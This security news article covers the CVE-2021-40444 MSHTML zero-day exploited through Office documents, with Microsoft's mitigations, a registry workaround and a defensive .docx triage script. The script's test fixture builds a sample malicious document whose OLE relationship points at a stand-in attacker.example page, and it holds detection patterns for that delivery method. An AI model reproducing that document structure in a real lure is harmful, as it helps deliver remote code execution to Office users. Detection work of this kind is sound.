Active Zero Day Attack on Microsoft Internet Explorer with Office 365

Microsoft has reported an actively exploited zero-day vulnerability in MSHTML, the rendering engine of Internet Explorer, that lets an attacker execute arbitrary code remotely on a user's system.

The flaw is in MSHTML (also known as Trident), the browser rendering engine used by Internet Explorer. Microsoft Office also hosts MSHTML to render HTML content inside Word, Excel, and PowerPoint documents, which is why a document, rather than the browser itself, is the attack vector here.

The attackers are targeting Microsoft Office users running Office 365 and Office 2019 on Windows 10 and on many Windows Server versions. The vulnerability is being exploited in the wild and no security patch is available as of this writing, but Microsoft has published recommendations to mitigate the risk.

The zero-day is tracked as CVE-2021-40444 and carries a CVSS score of 8.8 (High severity).

A zero-day vulnerability is a software flaw for which no patch is available yet: the vendor may already know about the bug, but a fix has not been released, so mitigation is the only defense in the meantime.

Until a patch ships, attackers can use the security loophole to run code, alter programs, access data, steal credentials, and so on.

How Attacker can Exploit the Zero-Day Bug in Internet Explorer:

The victim does not need to open Internet Explorer. The attacker crafts a malicious ActiveX control and embeds it in a Microsoft Office document, typically a .DOCX. When the victim opens the file, Office loads the Internet Explorer rendering engine (MSHTML) to display a remote web page hosted by the attacker, and the ActiveX control delivered through that page executes arbitrary code with the rights of the logged-on user.

"Suspicious Cpl File Execution" is not the name of the malware but the title of the Microsoft Defender for Endpoint alert that fires on this attack chain, in which the ActiveX control drops and runs a Control Panel (.cpl) file on the victim's system. Because the code runs with the privileges of the user who opened the document, victims who work from high-privilege administrative accounts are at greater risk: the attacker can then compromise the whole system, whereas a standard user account limits the damage.

Office normally warns that documents received from the Internet may be unsafe and opens them in Protected View (or, where it is deployed, in Application Guard for Office), which blocks this attack. In practice, users are often tricked into clicking "Enable Editing" without a second thought, which disarms those protections.
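To make the delivery mechanism concrete, here is an added triage script written for this page (it is not Microsoft's, EXPMON's or Mandiant's code) that inspects a .docx for the structure the in-the-wild documents used: a linked OLE object with ProgID htmlfile whose package relationship points at an external mhtml:/http URL, which is what makes Word hand the document over to MSHTML and fetch the attacker's page. The attacker.example URL, the two sample documents and the minimal package parts are constructed inline; the heuristic flags only this specific pattern and is a triage aid, not a replacement for Defender or Protected View.

```python
"""Triage a .docx for the MSHTML/ActiveX delivery pattern: an OLE object whose
package relationship points at a remote web page that Word will render with
the Internet Explorer engine. Added example; samples below are constructed."""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass

PKG_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL_SUFFIX = "/oleObject"
REMOTE_SCHEMES = ("http:", "https:", "mhtml:")
# Every <o:OLEObject ...> start tag in a document part; attributes are checked per match.
OLE_TAG_RE = re.compile(rb"<o:OLEObject\b[^>]*>")


@dataclass
class Finding:
    part: str    # zip member (package part) that triggered the hit
    detail: str  # human-readable reason


def _scan_rels(part: str, data: bytes) -> list[Finding]:
    """Flag relationships that send an OLE object to a remote URL, or use mhtml: at all."""
    hits = []
    for rel in ET.fromstring(data).iter(PKG_NS + "Relationship"):
        target = rel.get("Target", "")
        external = rel.get("TargetMode", "").lower() == "external"
        is_ole = rel.get("Type", "").endswith(OLE_REL_SUFFIX)
        remote = target.lower().startswith(REMOTE_SCHEMES)
        if (external and is_ole and remote) or target.lower().startswith("mhtml:"):
            hits.append(Finding(part, f"relationship {rel.get('Id')} targets remote URL {target}"))
    return hits


def _scan_ole_objects(part: str, data: bytes) -> list[Finding]:
    """Flag linked OLE objects with ProgID htmlfile: Word instantiates MSHTML for these."""
    hits = []
    for m in OLE_TAG_RE.finditer(data):
        tag = m.group(0)
        if b'Type="Link"' in tag and b'ProgID="htmlfile"' in tag:
            hits.append(Finding(part, "linked OLEObject with ProgID htmlfile: " + tag.decode(errors="replace")))
    return hits


def scan_docx(data: bytes) -> list[Finding]:
    """Walk the OOXML package: every .rels part and every XML part is inspected."""
    findings: list[Finding] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith(".rels"):
                findings += _scan_rels(name, zf.read(name))
            elif name.endswith(".xml"):
                findings += _scan_ole_objects(name, zf.read(name))
    return findings


# --- constructed sample documents (hypothetical, not real malware) ----------
RELS_HDR = b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
OLE_TYPE = b"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
ROOT_RELS = (RELS_HDR + b'<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
             b'officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
             b'</Relationships>')
W_NS = b'xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'


def build_docx(document_xml: bytes, document_rels: bytes) -> bytes:
    """Pack a minimal .docx in memory containing only the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("_rels/.rels", ROOT_RELS)
        zf.writestr("word/document.xml", document_xml)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


MALICIOUS_DOCX = build_docx(
    b'<w:document ' + W_NS + b' xmlns:o="urn:schemas-microsoft-com:office:office" '
    b'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
    b'<w:body><w:p><w:r><w:object><o:OLEObject Type="Link" ProgID="htmlfile" '
    b'r:id="rId5" UpdateMode="Always"/></w:object></w:r></w:p></w:body></w:document>',
    RELS_HDR + b'<Relationship Id="rId5" Type="' + OLE_TYPE + b'" '
    b'Target="mhtml:http://attacker.example/side.html" TargetMode="External"/></Relationships>',
)
BENIGN_DOCX = build_docx(
    b'<w:document ' + W_NS + b'><w:body><w:p/></w:body></w:document>',
    RELS_HDR + b'<Relationship Id="rId1" Type="' + OLE_TYPE + b'" '
    b'Target="embeddings/oleObject1.bin"/></Relationships>',  # embedded, not external
)

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_DOCX), ("benign", BENIGN_DOCX)):
        print(label, [f"{f.part}: {f.detail}" for f in scan_docx(doc)])
```

Run against a real file with `scan_docx(open(path, "rb").read())`. The sample with the external mhtml: relationship produces two findings (one from the relationship part, one from the htmlfile OLE object); the benign sample, whose OLE object is embedded inside the package, produces none. An embedded object is not proof of safety, only absence of this particular vector.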


Microsoft Credits EXPMON and Mandiant for Reporting the Vulnerability:

In its security advisory, Microsoft acknowledged researchers from the cyber security companies EXPMON and Mandiant, who detected and reported the zero-day vulnerability in its products.

In a tweet, EXPMON described the vulnerability as a “highly sophisticated zero-day attack” after finding that the attack mechanism is 100% reliable and dangerous. They added that the attackers are targeting Microsoft Office users and that the attack was successfully tested on the latest Office 2019 / Office 365 on Windows 10.

Microsoft Released an Official Security Update Guide Entry for CVE-2021-40444:

Microsoft published the issue in its Security Update Guide as “Microsoft MSHTML Remote Code Execution Vulnerability” under the identifier CVE-2021-40444.

The entry describes the vulnerability but gives no further detail about the nature of the zero-day attacks, the threat actor behind them, or their targets.

Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents. Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.

Microsoft spokesperson

There is no official security patch for the bug yet, but Microsoft recommends following the mitigations and temporary workarounds in the advisory to protect systems from this zero-day.

Microsoft added that the vulnerability is still under investigation and that an official fix will follow. Security experts expect it on September 14, the date of Microsoft's next monthly “Patch Tuesday” bundle of security updates.

Microsoft's official advisory for the zero-day: Security Update Guide – Microsoft MSHTML Remote Code Execution Vulnerability

Mitigations Steps Advised by Microsoft for Zero-Day flaw in their Products:

In its Security Update Guide entry for the MSHTML remote code execution vulnerability, Microsoft recommends the following mitigations and workarounds.

Mitigation: by default, documents from the Internet open in Microsoft Office in Protected View or in Application Guard for Office, and both block the current attack. Do not leave Protected View for a document you did not expect.

Microsoft Defender Antivirus and Microsoft Defender for Endpoint both detect and block this attack. Keep anti-malware products up to date; customers on automatic updates do not need to take any additional action.

Workaround Suggested by Microsoft for CVE-2021-40444 Zero-Day Attack:

Until the official patch is released, Microsoft advises disabling the installation of all ActiveX controls in Internet Explorer, which closes the path the exploit uses to load its control. This is done by adding a few policy keys to the Windows registry.

The advisory gives the following instructions.

To disable ActiveX controls on an individual system:

  1. To disable installing ActiveX controls in Internet Explorer in all zones, paste the following into a text file and save it with the .reg file extension:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1001"=dword:00000003
"1004"=dword:00000003

  2. Double-click the .reg file to apply it to your Policy hive.
  3. Reboot the system to ensure the new configuration is applied.

The value names are Internet Explorer URL-action codes: 1001 is “Download signed ActiveX controls” and 1004 is “Download unsigned ActiveX controls”, and a value of 3 means Disable. Zones 0 to 3 are Local Machine, Local Intranet, Trusted Sites and Internet. Because the keys sit under HKEY_LOCAL_MACHINE\SOFTWARE\Policies, they apply as policy to every user on the machine and override per-user zone settings. ActiveX controls that are already installed keep running, but they do not expose this vulnerability. To undo the workaround once the patch is installed, delete the keys you added and reboot.
